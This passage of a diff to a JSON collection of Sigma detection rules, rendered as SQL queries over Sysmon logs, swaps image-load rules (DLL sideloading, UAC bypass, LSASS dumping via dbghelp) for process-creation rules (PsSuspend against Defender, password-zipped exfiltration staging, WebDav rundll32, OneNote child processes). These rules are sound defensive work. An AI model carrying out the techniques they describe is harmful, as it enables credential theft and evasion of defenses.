'\\') AND CommandLine LIKE '%Nul%' ESCAPE '\\' AND (CommandLine LIKE '% /f %' ESCAPE '\\' OR CommandLine LIKE '% -f %' ESCAPE '\\' OR CommandLine LIKE '% /q %' ESCAPE '\\' OR CommandLine LIKE '% -q %' ESCAPE '\\') AND CommandLine LIKE '%ping%' ESCAPE '\\' AND CommandLine LIKE '%del %' ESCAPE '\\')" ], - "filename": "image_load_malware_3cx_compromise_susp_dll.yml" + "filename": "proc_creation_win_cmd_ping_del_combined_execution.yml" }, { - "title": "UAC Bypass Using Iscsicpl - ImageLoad", - "id": "9ed5959a-c43c-4c59-84e3-d28628429456", + "title": "Sysinternals PsSuspend Suspicious Execution", + "id": "4beb6ae0-f85b-41e2-8f18-8668abc8af78", "status": "experimental", - "description": "Detects the \"iscsicpl.exe\" UAC bypass technique that leverages a DLL Search Order hijacking technique to load a custom DLL's from temp or a any user controlled location in the users %PATH%", + "description": "Detects suspicious execution of Sysinternals PsSuspend, where the utility is used to suspend critical processes such as AV or EDR to bypass defenses", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\iscsicpl.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\iscsiexe.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\' AND ImageLoaded LIKE '%iscsiexe.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'pssuspend.exe' OR (Image LIKE '%\\\\pssuspend.exe' ESCAPE '\\' OR Image LIKE '%\\\\pssuspend64.exe' ESCAPE '\\')) AND CommandLine LIKE '%msmpeng.exe%' ESCAPE '\\')" ], - "filename": "image_load_uac_bypass_iscsicpl.yml" + "filename": "proc_creation_win_sysinternals_pssuspend_susp_execution.yml" }, { - "title": "DotNet CLR DLL Loaded By Scripting Applications", - "id": "4508a70e-97ef-4300-b62b-ff27992990ea", + "title": "Compress Data and Lock With Password for Exfiltration With WINZIP", + "id": "e2e80da2-8c66-4e00-ae3c-2eebd29f6b6d", "status": "test", - "description": "Detects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. This could be an indication of potential suspicious execution.", - "author": "omkar72, oscd.community", + "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities", + "author": "frack113", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.t1055" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (ImageLoaded LIKE '%\\\\clr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscoree.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscorlib.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%winzip.exe%' ESCAPE '\\' OR CommandLine LIKE '%winzip64.exe%' ESCAPE '\\') AND CommandLine LIKE '%-s\"%' ESCAPE '\\' AND (CommandLine LIKE '% -min %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\'))" ], - "filename": "image_load_susp_script_dotnet_clr_dll_load.yml" + "filename": "proc_creation_win_winzip_password_compression.yml" }, { - "title": "Potential Wazuh Security Platform DLL Sideloading", - "id": "db77ce78-7e28-4188-9337-cf30e2b3ba9f", + "title": "Parent in Public Folder Suspicious Process", + "id": "69bd9b97-2be2-41b6-9816-fb08757a4d1a", "status": "experimental", - "description": "Detects potential DLL sideloading of DLLs that are part of the Wazuh security platform", - "author": "X__Junior", - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" - ], + "description": "This rule detects suspicious processes with parent images located in the C:\\Users\\Public folder", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\libwazuhshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\libwinpthread-1.dll' ESCAPE '\\') AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\ossec-agent\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Inkscape\\\\bin\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Pidgin\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%wscript.exe%' ESCAPE '\\' OR CommandLine LIKE '%cscript.exe%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%mshta.exe%' ESCAPE '\\'))" ], - "filename": "image_load_side_load_wazuh.yml" + "filename": "proc_creation_win_susp_execution_from_public_folder_as_parent.yml" }, { - "title": "APT PRIVATELOG Image Load Pattern", - "id": "33a2d1dd-f3b0-40bd-8baf-7974468927cc", + "title": "WebDav Client Execution", + "id": "2dbd9d3d-9e27-42a8-b8df-f13825c6c3d5", "status": "test", - "description": "Detects an image load pattern as seen when a tool named PRIVATELOG is used and rarely observed under legitimate circumstances", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects \"svchost.exe\" spawning \"rundll32.exe\" with command arguments like C:\\windows\\system32\\davclnt.dll,DavSetCookie.\nThis could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server).\n", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.exfiltration", + "attack.t1048.003" ], "falsepositives": [ - "Rarely observed" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\clfsw32.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\')" ], - "filename": "image_load_usp_svchost_clfsw32.yml" + "filename": "proc_creation_win_rundll32_webdav_client_execution.yml" }, { - "title": "Abusing Azure Browser SSO", - "id": "50f852e6-af22-4c78-9ede-42ef36aa3453", - "status": "test", - "description": "Detects abusing Azure Browser SSO by requesting OAuth 2.0 refresh tokens for an Azure-AD-authenticated Windows user (i.e. the machine is joined to Azure AD and a user logs in with their Azure AD account)\nwanting to perform SSO authentication in the browser.\nAn attacker can use this to authenticate to Azure AD in a browser as that user.\n", - "author": "Den Iuzvyk", + "title": "Suspicious Svchost Process", + "id": "01d2e2a1-5f09-44f7-9fc1-24faa7479b6d", + "status": "experimental", + "description": "Detects a suspicious svchost process start", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.002" + "attack.t1036.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%MicrosoftAccountTokenProvider.dll' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\BackgroundTaskHost.exe' ESCAPE '\\' OR Image LIKE '%\\\\devenv.exe' ESCAPE '\\' OR Image LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR Image LIKE '%\\\\MicrosoftEdge.exe' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\OneDrive.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\' OR Image LIKE '%\\\\OneDrive.exe' ESCAPE '\\') OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\%' ESCAPE '\\' OR Image = ''))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NOT (((ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\Mrt.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rpcnet.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ngen.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\TiWorker.exe' ESCAPE '\\')) OR (ParentImage = '') OR (ParentImage = '') OR (ParentImage = '-')))" ], - "filename": "image_load_abusing_azure_browser_sso.yml" + "filename": "proc_creation_win_svchost_susp_parent_process.yml" }, { - "title": "DLL Loaded From Suspicious Location Via Cmspt.EXE", - "id": "75e508f7-932d-4ebc-af77-269237a84ce1", - "status": "experimental", - "description": "Detects cmstp loading \"dll\" or \"ocx\" files from suspicious locations", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious aspnet_compiler.exe Execution", + "id": "a01b8329-5953-4f73-ae2d-aa01e1f35f00", + "status": "test", + "description": "Execute C# code with the Build Provider and proper folder structure in place.", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1218.003" + "attack.t1127" ], "falsepositives": [ - "Unikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Users\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\') AND (ImageLoaded LIKE '%.dll' ESCAPE '\\' OR ImageLoaded LIKE '%.ocx' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%C:\\\\Windows\\\\Microsoft.NET\\\\Framework%' ESCAPE '\\' AND Image LIKE '%aspnet\\_compiler.exe%' ESCAPE '\\')" ], - "filename": "image_load_cmstp_load_dll_from_susp_location.yml" + "filename": "proc_creation_win_lolbin_aspnet_compiler.yml" }, { - "title": "Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE", - "id": "ec8c4047-fad9-416a-8c81-0f479353d7f6", - "status": "experimental", - "description": "Detects both of CVE-2022-30190 (Follina) and DogWalk vulnerabilities exploiting msdt.exe binary to load the \"sdiageng.dll\" library", - "author": "Greg (rule)", + "title": "Zip A Folder With PowerShell For Staging In Temp", + "id": "85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98", + "status": "test", + "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1202", - "cve.2022.30190" + "attack.collection", + "attack.t1074.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\msdt.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\sdiageng.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Compress-Archive %' ESCAPE '\\' AND CommandLine LIKE '% -Path %' ESCAPE '\\' AND CommandLine LIKE '% -DestinationPath %' ESCAPE '\\' AND CommandLine LIKE '%$env:TEMP\\\\%' ESCAPE '\\')" ], - "filename": "image_load_dll_sdiageng_load_by_msdt.yml" + "filename": "proc_creation_win_powershell_zip_compress.yml" }, { - "title": "Potential DLL Sideloading Of Non-Existent DLLs From System Folders", - "id": "6b98b92b-4f00-4f62-b4fe-4d1920215771", + "title": "Suspicious RunAs-Like Flag Combination", + "id": "50d66fb0-03f8-4da0-8add-84e77d12a020", "status": "experimental", - "description": "Detects DLL sideloading of system dlls that are not present on the system by default. Usually to achieve techniques such as UAC bypass and privilege escalation", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious command line flags that let the user set a target user and command as e.g. seen in PsExec-like tools", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.privilege_escalation" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\WLBSCTRL.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\TSMSISrv.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\TSVIPSrv.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\wow64log.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\WptsExtensions.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') AND NOT ((Signed = 'true' AND Signature = 'Microsoft Windows')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -u system %' ESCAPE '\\' OR CommandLine LIKE '% --user system %' ESCAPE '\\' OR CommandLine LIKE '% -u NT%' ESCAPE '\\' OR CommandLine LIKE '% -u \"NT%' ESCAPE '\\' OR CommandLine LIKE '% -u ''NT%' ESCAPE '\\' OR CommandLine LIKE '% --system %' ESCAPE '\\' OR CommandLine LIKE '% -u administrator %' ESCAPE '\\') AND (CommandLine LIKE '% -c cmd%' ESCAPE '\\' OR CommandLine LIKE '% -c \"cmd%' ESCAPE '\\' OR CommandLine LIKE '% -c powershell%' ESCAPE '\\' OR CommandLine LIKE '% -c \"powershell%' ESCAPE '\\' OR CommandLine LIKE '% --command cmd%' ESCAPE '\\' OR CommandLine LIKE '% --command powershell%' ESCAPE '\\' OR CommandLine LIKE '% -c whoami%' ESCAPE '\\' OR CommandLine LIKE '% -c wscript%' ESCAPE '\\' OR CommandLine LIKE '% -c cscript%' ESCAPE '\\'))" ], - "filename": "image_load_side_load_non_existent_dlls.yml" + "filename": "proc_creation_win_susp_privilege_escalation_cli_patterns.yml" }, { - "title": "Potential Rcdll.DLL Sideloading", - "id": "6e78b74f-c762-4800-82ad-f66787f10c8a", - "status": "experimental", - "description": "Detects potential DLL sideloading of rcdll.dll", - "author": "X__Junior", + "title": "File or Folder Permissions Modifications", + "id": "37ae075c-271b-459b-8d7b-55ad5f993dd8", + "status": "test", + "description": "Detects a file or folder's permissions being modified or tampered with.", + "author": "Jakob Weinzettl, oscd.community, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1222.001" ], "falsepositives": [ - "Unknown" + "Users interacting with the files on their own (unlikely unless privileged users).", + "Dynatrace app" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\rcdll.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Kits\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\cacls.exe' ESCAPE '\\' OR Image LIKE '%\\\\icacls.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND (CommandLine LIKE '%/grant%' ESCAPE '\\' OR CommandLine LIKE '%/setowner%' ESCAPE '\\' OR CommandLine LIKE '%/inheritance:r%' ESCAPE '\\')) OR (Image LIKE '%\\\\attrib.exe' ESCAPE '\\' AND CommandLine LIKE '%-r%' ESCAPE '\\') OR Image LIKE '%\\\\takeown.exe' ESCAPE '\\') AND NOT ((CommandLine LIKE '%ICACLS C:\\\\ProgramData\\\\dynatrace\\\\gateway\\\\config\\\\connectivity.history /reset' ESCAPE '\\') OR (CommandLine LIKE '%ICACLS C:\\\\ProgramData\\\\dynatrace\\\\gateway\\\\config\\\\config.properties /grant :r %' ESCAPE '\\' AND CommandLine LIKE '%S-1-5-19:F%' ESCAPE '\\') OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\')))" ], - "filename": "image_load_side_load_rcdll.yml" + "filename": "proc_creation_win_susp_file_permission_modifications.yml" }, { - "title": "VMGuestLib DLL Sideload", - "id": "70e8e9b4-6a93-4cb7-8cde-da69502e7aff", - "status": "experimental", - "description": "Detects DLL sideloading of VMGuestLib.dll by the WmiApSrv service.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Explorer Process Tree Break", + "id": "949f1ffb-6e85-4f00-ae1e-c3c5b190d605", + "status": "test", + "description": "Detects a command line process that uses explorer.exe to launch arbitrary commands or binaries,\nwhich is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer spawning from \"svchost\"\n", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), @gott_cyber", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1036" ], "falsepositives": [ - "FP could occur if the legitimate version of vmGuestLib already exists on the system" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\VMware\\\\VMware Tools\\\\vmStatsProvider\\\\win32%' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\vmGuestLib.dll%' ESCAPE '\\' AND Image LIKE '%\\\\Windows\\\\System32\\\\wbem\\\\WmiApSrv.exe' ESCAPE '\\') AND NOT (Signed = 'true'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%/factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b}%' ESCAPE '\\' OR (CommandLine LIKE '%explorer.exe%' ESCAPE '\\' AND CommandLine LIKE '% /root,%' ESCAPE '\\')))" ], - "filename": "image_load_side_load_vmguestlib.yml" + "filename": "proc_creation_win_explorer_break_process_tree.yml" }, { - "title": "Potential DLL Sideloading Using Coregen.exe", - "id": "0fa66f66-e3f6-4a9c-93f8-4f2610b00171", + "title": "Suspicious Microsoft OneNote Child Process", + "id": "c27515df-97a9-4162-8a60-dc0eeb51b775", "status": "experimental", - "description": "Detect usage of DLL \"coregen.exe\" (Microsoft CoreCLR Native Image Generator) binary to sideload arbitrary DLLs.", - "author": "frack113", + "description": "Detects suspicious child processes of the Microsoft OneNote application. This may indicate an attempt to execute malicious embedded objects from a .one file.", + "author": "Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), Elastic (idea)", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.t1055" + "attack.t1566", + "attack.t1566.001", + "attack.initial_access" ], "falsepositives": [ - "Unknown" + "File located in the AppData folder with trusted signature" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\coregen.exe' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Silverlight\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Silverlight\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\onenote.exe' ESCAPE '\\' AND ((OriginalFileName IN ('bitsadmin.exe', 'CertOC.exe', 'CertUtil.exe', 'Cmd.Exe', 'CMSTP.EXE', 'cscript.exe', 'curl.exe', 'HH.exe', 'IEExec.exe', 'InstallUtil.exe', 'javaw.exe', 'Microsoft.Workflow.Compiler.exe', 'msdt.exe', 'MSHTA.EXE', 'msiexec.exe', 'Msxsl.exe', 'odbcconf.exe', 'pcalua.exe', 'PowerShell.EXE', 'RegAsm.exe', 'RegSvcs.exe', 'REGSVR32.exe', 'RUNDLL32.exe', 'schtasks.exe', 'ScriptRunner.exe', 'wmic.exe', 'WorkFolders.exe', 'wscript.exe') OR (Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\control.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\ieexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\installutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\javaw.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\msidb.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR Image LIKE '%\\\\pcalua.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regasm.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\workfolders.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\explorer.exe' ESCAPE '\\' AND (CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.vb%' ESCAPE '\\' OR CommandLine LIKE '%.wsh%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.ps%' ESCAPE '\\' OR CommandLine LIKE '%.scr%' ESCAPE '\\' OR CommandLine LIKE '%.pif%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\')) OR (Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\'))) AND NOT ((Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\FileCoAuth.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding' ESCAPE '\\')))" ], - "filename": "image_load_side_load_coregen.yml" + "filename": "proc_creation_win_office_onenote_susp_child_processes.yml" }, { - "title": "Potential Iviewers.DLL Sideloading", - "id": "4c21b805-4dd7-469f-b47d-7383a8fcb437", + "title": "Suspicious Execution of Shutdown to Log Out", + "id": "ec290c06-9b6b-4338-8b6b-095c0f284f10", "status": "experimental", - "description": "Detects potential DLL sideloading of \"iviewers.dll\" (OLE/COM Object Interface Viewer)", - "author": "X__Junior", + "description": "Detects the rare use of the command line tool shutdown to logoff a user", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.impact", + "attack.t1529" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\iviewers.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Kits\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Windows Kits\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\shutdown.exe' ESCAPE '\\' AND CommandLine LIKE '%/l%' ESCAPE '\\')" ], - "filename": "image_load_side_load_iviewers.yml" + "filename": "proc_creation_win_shutdown_logoff.yml" }, { - "title": "Load Of Dbghelp/Dbgcore DLL From Suspicious Process", - "id": "0e277796-5f23-4e49-a490-483131d4f6e1", + "title": "Deny Service Access Using Security Descriptor Tampering Via Sc.EXE", + "id": "99cf1e02-00fb-4c0d-8375-563f978dfd37", "status": "test", - "description": "Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.\nTools like ProcessHacker and some attacker tradecraft use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\nAs an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.\n", - "author": "Perez Diego (@darkquassar), oscd.community, Ecco", + "description": "Detects suspicious DACL modifications to deny access to a service that affects critical trustees. This can be used to hide services or make them unstoppable.", + "author": "Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.persistence", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID 